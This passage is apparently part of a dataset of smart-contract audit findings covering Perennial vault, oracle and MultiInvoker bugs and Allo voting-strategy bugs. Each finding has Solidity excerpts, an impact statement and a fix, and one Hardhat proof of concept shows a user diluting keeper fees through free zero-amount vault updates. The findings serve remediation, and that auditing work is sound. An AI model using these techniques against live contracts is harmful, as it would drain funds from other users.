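The front-run described above comes down to the shared monotonic publish-time check. A minimal Python model (assumed names, not the real contract API) shows the keeper's transaction reverting once the attacker's `commit()` lands first:

```python
# Toy model of the publish-time monotonicity shared by commit() and
# commitRequested(): once any path bumps lastCommittedPublishTime, a later
# commitRequested() carrying the same VAA reverts.
class Oracle:
    def __init__(self):
        self.last_committed_publish_time = 0

    def _check_and_set(self, publish_time):
        # mirrors: if (publishTime <= lastCommittedPublishTime) revert ...
        if publish_time <= self.last_committed_publish_time:
            raise RuntimeError("PythOracleNonIncreasingPublishTimes")
        self.last_committed_publish_time = publish_time

    def commit(self, publish_time):            # attacker's front-run path
        self._check_and_set(publish_time)

    def commit_requested(self, publish_time):  # keeper's path
        self._check_and_set(publish_time)

oracle = Oracle()
oracle.commit(205)                  # front-runner lands first with publishTime 205
try:
    oracle.commit_requested(205)    # keeper's tx now reverts
    keeper_reverted = False
except RuntimeError:
    keeper_reverted = True
```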
`Vault.update(anyUser,0,0,0)` can be called for free to increase `checkpoint.count` and pay a smaller keeper fee than necessary
medium
`Vault._update(user, 0, 0, 0)` will pass all invariants checks:\\n```\\n// invariant\\n// @audit operator - pass\\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\\n revert VaultNotOperatorError();\\n// @audit 0,0,0 is single-sided - pass\\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\\n revert VaultNotSingleSidedError();\\n// @audit depositAssets == 0 - pass\\nif (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// @audit redeemShares == 0 - pass\\nif (redeemShares.gt(_maxRedeem(context)))\\n revert VaultRedemptionLimitExceededError();\\n// @audit depositAssets == 0 - pass\\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\\n revert VaultInsufficientMinimumError();\\n// @audit redeemShares == 0 - pass\\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\\n revert VaultInsufficientMinimumError();\\n// @audit since this will be called by **different** users in the same epoch, this will also pass\\nif (context.local.current != context.local.latest) revert VaultExistingOrderError();\\n```\\n\\nIt then calculates amount to claim by calling _socialize:\\n```\\n// asses socialization and settlement fee\\nUFixed6 claimAmount = _socialize(context, depositAssets, redeemShares, claimAssets);\\n// rest of code\\nfunction _socialize(\\n Context memory context,\\n UFixed6 depositAssets,\\n UFixed6 redeemShares,\\n UFixed6 claimAssets\\n) private view returns (UFixed6 claimAmount) {\\n // @audit global assets must be 0 to make (0,0,0) pass this function\\n if (context.global.assets.isZero()) return UFixed6Lib.ZERO;\\n UFixed6 totalCollateral = UFixed6Lib.from(_collateral(context).max(Fixed6Lib.ZERO));\\n claimAmount = claimAssets.muldiv(totalCollateral.min(context.global.assets), context.global.assets);\\n\\n // @audit for (0,0,0) this will revert 
(underflow)\\n if (depositAssets.isZero() && redeemShares.isZero()) claimAmount = claimAmount.sub(context.settlementFee);\\n}\\n```\\n\\n`_socialize` will immediately return 0 if `context.global.assets == 0`. If `context.global.assets > 0`, then this function will revert in the last line due to underflow (trying to subtract `settlementFee` from 0 claimAmount)\\nThis is the condition for this issue to happen: global assets must be 0. Global assets are the amounts redeemed but not yet claimed by users. So this can reasonably happen in the first days of the vault life, when users mostly only deposit, or claim everything they withdraw.\\nOnce this function passes, the following lines increase checkpoint.count:\\n```\\n// update positions\\ncontext.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.currentCheckpoint.update(depositAssets, redeemShares);\\n// rest of code\\n// Checkpoint library:\\n// rest of code\\nfunction update(Checkpoint memory self, UFixed6 deposit, UFixed6 redemption) internal pure {\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n self.count++;\\n}\\n```\\n\\nThe rest of the function executes normally.\\nDuring position settlement, pending user deposits and redeems are reduced by the keeper fees / checkpoint.count:\\n```\\n// Account library:\\n// rest of code\\nfunction processLocal(\\n Account memory self,\\n uint256 latestId,\\n Checkpoint memory checkpoint,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.latest = latestId;\\n (self.assets, self.shares) = (\\n self.assets.add(checkpoint.toAssetsLocal(redemption)),\\n self.shares.add(checkpoint.toSharesLocal(deposit))\\n );\\n (self.deposit, self.redemption) = (self.deposit.sub(deposit), self.redemption.sub(redemption));\\n}\\n// rest of code\\n// Checkpoint library\\n// 
toAssetsLocal / toSharesLocal calls _withoutKeeperLocal to calculate keeper fees:\\n// rest of code\\n function _withoutKeeperLocal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 keeperPer = self.count == 0 ? UFixed6Lib.ZERO : self.keeper.div(UFixed6Lib.from(self.count));\\n return _withoutKeeper(amount, keeperPer);\\n }\\n```\\n\\nAlso notice that in `processLocal` the only thing which keeper fees influence are deposits and redemptions, but not claims.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('inflate checkpoint count', async () => {\\n const settlementFee = parse6decimal('10.00')\\n const marketParameter = { // rest of code(await market.parameter()) }\\n marketParameter.settlementFee = settlementFee\\n await market.connect(owner).updateParameter(marketParameter)\\n const btcMarketParameter = { // rest of code(await btcMarket.parameter()) }\\n btcMarketParameter.settlementFee = settlementFee\\n await btcMarket.connect(owner).updateParameter(btcMarketParameter)\\n\\n const deposit = parse6decimal('10000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n await updateOracle()\\n await vault.settle(user.address)\\n\\n const deposit2 = parse6decimal('10000')\\n await vault.connect(user2).update(user2.address, deposit2, 0, 0)\\n\\n // inflate checkpoint.count\\n await vault.connect(btcUser1).update(btcUser1.address, 0, 0, 0)\\n await vault.connect(btcUser2).update(btcUser2.address, 0, 0, 0)\\n\\n await updateOracle()\\n await vault.connect(user2).settle(user2.address)\\n\\n const checkpoint2 = await vault.checkpoints(3)\\n console.log("checkpoint count = " + checkpoint2.count)\\n\\n var account = await vault.accounts(user.address);\\n var assets = await vault.convertToAssets(account.shares);\\n console.log("User shares:" + account.shares + " assets: " + assets);\\n var account = await vault.accounts(user2.address);\\n var assets = await 
vault.convertToAssets(account.shares);\\n console.log("User2 shares:" + account.shares + " assets: " + assets);\\n})\\n```\\n\\nConsole output:\\n```\\ncheckpoint count = 3\\nUser shares:10000000000 assets: 9990218973\\nUser2 shares:10013140463 assets: 10003346584\\n```\\n\\nSo the user2 inflates his deposited amounts by paying smaller keeper fee.\\nIf 2 lines which inflate checkpoint count (after corresponding comment) are deleted, then the output is:\\n```\\ncheckpoint count = 1\\nUser shares:10000000000 assets: 9990218973\\nUser2 shares:9999780702 assets: 9989999890\\n```\\n\\nSo if not inflated, user2 pays correct amount and has roughly the same assets as user1 after his deposit.
Consider reverting (0,0,0) vault updates, or maybe redirecting to `settle` in this case. Additionally, consider updating checkpoint only if `depositAssets` or `redeemShares` are not zero:\\n```\\nif (!depositAssets.isZero() || !redeemShares.isZero())\\n context.currentCheckpoint.update(depositAssets, redeemShares);\\n```\\n
A malicious vault user can inflate `checkpoint.count` to pay a much smaller keeper fee than they should, at the expense of the other vault users.
```\\n// invariant\\n// @audit operator - pass\\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\\n revert VaultNotOperatorError();\\n// @audit 0,0,0 is single-sided - pass\\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\\n revert VaultNotSingleSidedError();\\n// @audit depositAssets == 0 - pass\\nif (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// @audit redeemShares == 0 - pass\\nif (redeemShares.gt(_maxRedeem(context)))\\n revert VaultRedemptionLimitExceededError();\\n// @audit depositAssets == 0 - pass\\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\\n revert VaultInsufficientMinimumError();\\n// @audit redeemShares == 0 - pass\\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\\n revert VaultInsufficientMinimumError();\\n// @audit since this will be called by **different** users in the same epoch, this will also pass\\nif (context.local.current != context.local.latest) revert VaultExistingOrderError();\\n```\\n
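Since `toAssetsLocal`/`toSharesLocal` divide the checkpoint's keeper fee by `checkpoint.count`, the dilution can be sanity-checked with trivial arithmetic (illustrative numbers, not the values from the test above):

```python
# Back-of-the-envelope check of how inflating checkpoint.count dilutes the
# per-user keeper fee: the fee is split as keeper / count, so free (0,0,0)
# updates shrink a real depositor's share of the fee.
def keeper_per_user(total_keeper_fee, checkpoint_count):
    # mirrors _withoutKeeperLocal's keeper.div(count), with the count==0 guard
    return 0 if checkpoint_count == 0 else total_keeper_fee / checkpoint_count

fee = 30.0                         # total keeper fee for the checkpoint (assumed)
honest = keeper_per_user(fee, 1)   # only the real depositor in the checkpoint
inflated = keeper_per_user(fee, 3) # two extra (0,0,0) updates joined for free
```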
MultiInvoker liquidation action will revert most of the time due to incorrect closable amount initialization
medium
`MultiInvoker` calculates the `closable` amount in its `_latest` function incorrectly. In particular, it doesn't initialize `closableAmount`, so it's set to 0 initially. It then scans pending positions, settling those which should be settled, and reducing `closableAmount` if necessary for remaining pending positions:\\n```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n 
closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n\\nNotice, that `closableAmount` is initialized to `previousMagnitude` only if there is at least one position that needs to be settled. However, if `local.latestId == local.currentId` (which is the case for most of the liquidations - position becomes liquidatable due to price changes without any pending positions created by the user), this loop is skipped entirely, never setting `closableAmount`, so it's incorrectly returned as 0, although it's not 0 (it should be the latest settled position magnitude).\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\n
Initialize `closableAmount` to previousMagnitude:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n+ closableAmount = previousMagnitude;\\n```\\n
All `MultiInvoker` liquidation actions will revert when trying to liquidate users without positions which can be settled, which can happen in 2 cases:\nThe liquidated user doesn't have any pending positions at all (local.latestId == local.currentId). This is the most common case (the price has changed and the user is liquidated without doing any actions) and we can reasonably expect it to apply to at least 50% of liquidations (probably more, like 80-90%).\nThe liquidated user does have pending positions, but no pending position is ready to be settled yet. For example, if a liquidator commits an unrequested oracle version which liquidates the user, even if the user already has a pending position (one which is not yet ready to be settled).\nSince this breaks important `MultiInvoker` functionality in most cases and causes loss of funds to the liquidator (a revert instead of receiving the liquidation fee), I believe this should be High severity.
```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n
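A stripped-down Python model of `_latest`'s closable computation (simplified: it drops settlement and invalidation and keeps only the subtraction loop) makes the missing initialization visible:

```python
# Simplified sketch of MultiInvoker._latest's closable math.
def closable_amount(latest_magnitude, pending_magnitudes, initialize):
    # initialize=True models the recommended `closableAmount = previousMagnitude;`
    amount = latest_magnitude if initialize else 0
    previous = latest_magnitude
    for pending in pending_magnitudes:  # pending positions not yet settled
        amount -= previous - min(pending, previous)
    return amount

# Most common liquidation case: no pending positions (latestId == currentId),
# so the loop body never runs.
buggy = closable_amount(10, [], initialize=False)  # stays 0, market update reverts
fixed = closable_amount(10, [], initialize=True)   # correct settled magnitude
```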
MultiInvoker liquidation action will revert due to incorrect closable amount calculation for invalid oracle versions
medium
`MultiInvoker` calculates the `closable` amount in its `_latest` function. This function basically repeats the logic of `Market._settle`, but fails to repeat it correctly for the invalid oracle version settlement. When invalid oracle version is settled, `latestPosition` invalidation should increment, but the `latestPosition` should remain the same. This is achieved in the `Market._processPositionLocal` by adjusting `newPosition` after invalidation before the `latestPosition` is set to newPosition:\\n```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n\\nHowever, `MultiInvoker` doesn't adjust the new position and simply sets `latestPosition` to new position both when oracle is valid or invalid:\\n```\\nif (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\nlatestPosition.update(pendingPosition);\\n```\\n\\nThis leads to incorrect value of `closableAmount` afterwards:\\n```\\npreviousMagnitude = latestPosition.magnitude();\\nclosableAmount = previousMagnitude;\\n```\\n\\nFor example, if `latestPosition.market = 10`, `pendingPosition.market = 0` and pendingPosition has invalid oracle, then:\\n`Market` will invalidate (latestPosition.invalidation.market = 10), adjust (pendingPosition.market = 10), set `latestPosition` to new `pendingPosition` (latestPosition.maker = pendingPosition.maker = 10), so `latestPosition.maker` correctly remains 10.\\n`MultiInvoker` will invalidate (latestPosition.invalidation.market = 10), and immediately set `latestPosition` to `pendingPosition` (latestPosition.maker = pendingPosition.maker = 0), so `latestPosition.maker` is set to 0 incorrectly.\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. 
See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\n
Both `Market` and `MultiInvoker` handle position settlement for invalid oracle versions incorrectly (Market issue with this was reported separately as it's completely different), so both should be fixed and the fix of this one will depend on how the `Market` bug is fixed. The way it is, `MultiInvoker` correctly adjusts pending position before invalidating `latestPosition` (which `Market` fails to do), however after such action `pendingPosition` must not be adjusted, because it was already adjusted and new adjustment should only change it by the difference from the last invalidation. The easier solution would be just not to change `latestPosition` in case of invalid oracle version, so the fix might be like this (just add else):\\n```\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n else latestPosition.update(pendingPosition);\\n```\\n\\nHowever, if the `Market` bug is fixed the way I proposed it (by changing `invalidate` function to take into account difference in invalidation of `latestPosition` and pendingPosition), then this fix will still be incorrect, because `invalidate` will expect unadjusted `pendingPosition`, so in this case `pendingPosition` should not be adjusted after loading it, but it will have to be adjusted for positions not yet settled. 
So the fix might look like this:\\n```\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n- pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n- latestPosition.update(pendingPosition);\\n+ else {\\n+ pendingPosition.adjust(latestPosition);\\n+ latestPosition.update(pendingPosition);\\n+ }\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n+ pendingPosition.adjust(latestPosition);\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n```\\n
If there is an invalid oracle version during pending position settlement in `MultiInvoker` liquidation action, it will incorrectly revert and will cause loss of funds for the liquidator who should have received liquidation fee, but reverts instead.\\nSince this breaks important `MultiInvoker` functionality in some rare edge cases (invalid oracle version, user has unsettled position which should settle during user liquidation with `LIQUIDATION` action of MultiInvoker), this should be a valid medium finding.
```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n
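The ordering difference can be reduced to simple arithmetic (an assumed, simplified invalidation model with a single maker value; the real library tracks per-side invalidation deltas):

```python
# Contrast the two settlement orders for an invalid oracle version:
# Market adjusts the pending position by the invalidation delta before
# updating latestPosition; MultiInvoker does not.
def market_settle(latest, pending):
    invalidation = latest - pending       # invalidate() records the delta
    adjusted_pending = pending + invalidation  # adjust() re-adds it
    return adjusted_pending               # latestPosition.update(adjusted)

def multiinvoker_settle(latest, pending):
    # invalidation is recorded, but pending is used unadjusted
    return pending                        # latestPosition.update(pendingPosition)

# Example from the finding: latest maker = 10, pending maker = 0, invalid oracle.
kept = market_settle(10, 0)          # Market keeps the maker position at 10
zeroed = multiinvoker_settle(10, 0)  # MultiInvoker wrongly drops it to 0
```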
Invalid oracle version can cause the vault to open too large and risky position and get liquidated due to using unadjusted global current position
medium
`StrategyLib._loadContext` for the market loads `currentPosition` as:\n```\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\n```\n\nHowever, this is the unadjusted position, so its value is incorrect if an invalid oracle version happens while this position is pending.\nLater on, the minimum and maximum positions enforced by the vault in the market are calculated in _positionLimit:\n```\nfunction _positionLimit(MarketContext memory context) private pure returns (UFixed6, UFixed6) {\n return (\n // minimum position size before crossing the net position\n context.currentAccountPosition.maker.sub(\n context.currentPosition.maker\n .sub(context.currentPosition.net().min(context.currentPosition.maker))\n .min(context.currentAccountPosition.maker)\n .min(context.closable)\n ),\n // maximum position size before crossing the maker limit\n context.currentAccountPosition.maker.add(\n context.riskParameter.makerLimit\n .sub(context.currentPosition.maker.min(context.riskParameter.makerLimit))\n )\n );\n}\n```\n\nAnd the target maker size for the market is set in allocate:\n```\n(targets[marketId].collateral, targets[marketId].position) = (\n Fixed6Lib.from(_locals.marketCollateral).sub(contexts[marketId].local.collateral),\n _locals.marketAssets\n .muldiv(registrations[marketId].leverage, contexts[marketId].latestPrice.abs())\n .min(_locals.maxPosition)\n .max(_locals.minPosition)\n);\n```\n\nSince `context.currentPosition` is incorrect, it can happen that both `_locals.minPosition` and `_locals.maxPosition` are too high, so the vault will open too large and risky a position, breaking its risk limits and possibly getting liquidated, especially if this happens during high volatility.
Adjust global current position after loading it:\\n```\\n context.currentPosition = registration.market.pendingPosition(global.currentId);\\n+ context.currentPosition.adjust(registration.market.position());\\n```\\n
If invalid oracle version happens, the vault might open too large and risky position in such market, potentially getting liquidated and vault users losing funds due to this liquidation.
```\\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\\n```\\n
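A rough numeric sketch (illustrative values; the real math uses `UFixed6` and also computes a minimum bound) of how an unadjusted pending maker understates global exposure and inflates the vault's maximum position:

```python
# The maker headroom used by _positionLimit's maximum bound:
# account maker + (makerLimit - min(global maker, makerLimit)).
def max_position(current_account_maker, current_global_maker, maker_limit):
    headroom = maker_limit - min(current_global_maker, maker_limit)
    return current_account_maker + headroom

MAKER_LIMIT = 1000
raw_pending_maker = 200       # unadjusted: invalidation delta not re-applied
adjusted_maker = 200 + 300    # adjusted for an assumed 300 invalidation delta

too_high = max_position(100, raw_pending_maker, MAKER_LIMIT)  # overstated cap
correct = max_position(100, adjusted_maker, MAKER_LIMIT)      # true cap
```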
`QVSimpleStrategy` never updates `allocator.voiceCredits`.
high
```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n\\n```\\n function _hasVoiceCreditsLeft(uint256 _voiceCreditsToAllocate, uint256 _allocatedVoiceCredits)\\n internal\\n view\\n override\\n returns (bool)\\n {\\n return _voiceCreditsToAllocate + _allocatedVoiceCredits <= maxVoiceCreditsPerAllocator;\\n }\\n```\\n\\nThe problem is that `allocator.voiceCredits` is always zero. Both `QVSimpleStrategy` and `QVBaseStrategy` don't update `allocator.voiceCredits`. Thus, allocators can cast more votes than `maxVoiceCreditsPerAllocator`.
Update `allocator.voiceCredits` in `QVSimpleStrategy._allocate`:\n```\n function _allocate(bytes memory _data, address _sender) internal virtual override {\n …\n\n // check that the recipient has voice credits left to allocate\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\n+ allocator.voiceCredits += voiceCreditsToAllocate;\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\n }\n```\n
Every allocator has an unlimited number of votes.
```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n
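The missing bookkeeping can be reproduced with a minimal Python model of the check. The `Allocator` class, cap value, and function names below are illustrative stand-ins for the Solidity, not the real contract:

```python
# Hypothetical model of QVSimpleStrategy's allocation check.
MAX_VOICE_CREDITS_PER_ALLOCATOR = 10

class Allocator:
    def __init__(self):
        self.voice_credits = 0  # bug: never incremented on allocation

def has_voice_credits_left(to_allocate, already_allocated):
    # mirrors _hasVoiceCreditsLeft
    return to_allocate + already_allocated <= MAX_VOICE_CREDITS_PER_ALLOCATOR

def allocate(allocator, credits):
    assert has_voice_credits_left(credits, allocator.voice_credits)
    # the buggy contract stops here; allocator.voice_credits is never updated

alice = Allocator()
for _ in range(100):        # far more total credits than the cap of 10
    allocate(alice, 10)     # every call still passes the check
print(alice.voice_credits)  # 0 -> the cap was never enforced
```

Because the tracked balance stays at zero, the cap check degenerates to `to_allocate <= max`, which any per-call amount satisfies.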
`recipientsCounter` should start from 1 in `DonationVotingMerkleDistributionBaseStrategy`
high
```\\n    function _registerRecipient(bytes memory _data, address _sender)\\n        internal\\n        override\\n        onlyActiveRegistration\\n        returns (address recipientId)\\n    {\\n        …\\n\\n        uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n        if (currentStatus == uint8(Status.None)) {\\n            // recipient registering new application\\n            recipientToStatusIndexes[recipientId] = recipientsCounter;\\n            _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n            bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n            emit Registered(recipientId, extendedData, _sender);\\n\\n            recipientsCounter++;\\n        } else {\\n            if (currentStatus == uint8(Status.Accepted)) {\\n                // recipient updating accepted application\\n                _setRecipientStatus(recipientId, uint8(Status.Pending));\\n            } else if (currentStatus == uint8(Status.Rejected)) {\\n                // recipient updating rejected application\\n                _setRecipientStatus(recipientId, uint8(Status.Appealed));\\n            }\\n            emit UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n        }\\n    }\\n```\\n\\n```\\n    function _getUintRecipientStatus(address _recipientId) internal view returns (uint8 status) {\\n        // Get the column index and current row\\n        (, uint256 colIndex, uint256 currentRow) = _getStatusRowColumn(_recipientId);\\n\\n        // Get the status from the 'currentRow' shifting by the 'colIndex'\\n        status = uint8((currentRow >> colIndex) & 15);\\n\\n        // Return the status\\n        return status;\\n    }\\n```\\n\\n```\\n    function _getStatusRowColumn(address _recipientId) internal view returns (uint256, uint256, uint256) {\\n        uint256 recipientIndex = recipientToStatusIndexes[_recipientId];\\n\\n        uint256 rowIndex = recipientIndex / 64; // 256 / 4\\n        uint256 colIndex = (recipientIndex % 64) * 4;\\n\\n        return (rowIndex, colIndex, statusesBitMap[rowIndex]);\\n    }\\n```\\n\\n```\\n    /// @notice The total number of recipients.\\n    uint256 public recipientsCounter;\\n```\\n\\nConsider the following situation:\\nAlice is the first recipient and calls `registerRecipient`:\\n```\\n// in _registerRecipient\\nrecipientToStatusIndexes[Alice] = recipientsCounter = 0;\\n_setRecipientStatus(Alice, uint8(Status.Pending));\\nrecipientCounter++\\n```\\n\\nBob calls `registerRecipient`.\\n```\\n// in _getStatusRowColumn\\nrecipientToStatusIndexes[Bob] = 0 // It would access the status of Alice\\n// in _registerRecipient\\ncurrentStatus = _getUintRecipientStatus(recipientId) = Status.Pending\\ncurrentStatus != uint8(Status.None) -> no new application is recorded in the pool.\\n```\\n\\nThis implementation error means the pool can only record the first application.
Make the counter start from 1. There are two methods to fix the issue.\\n\\n```\\n    /// @notice The total number of recipients.\\n-   uint256 public recipientsCounter;\\n+   uint256 public recipientsCounter = 1;\\n```\\n\\n\\n```\\n    function _registerRecipient(bytes memory _data, address _sender)\\n        internal\\n        override\\n        onlyActiveRegistration\\n        returns (address recipientId)\\n    {\\n        …\\n\\n        uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n        if (currentStatus == uint8(Status.None)) {\\n            // recipient registering new application\\n-           recipientToStatusIndexes[recipientId] = recipientsCounter;\\n+           recipientToStatusIndexes[recipientId] = recipientsCounter + 1;\\n            _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n            bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n            emit Registered(recipientId, extendedData, _sender);\\n\\n            recipientsCounter++;\\n        …\\n    }\\n```\\n
null
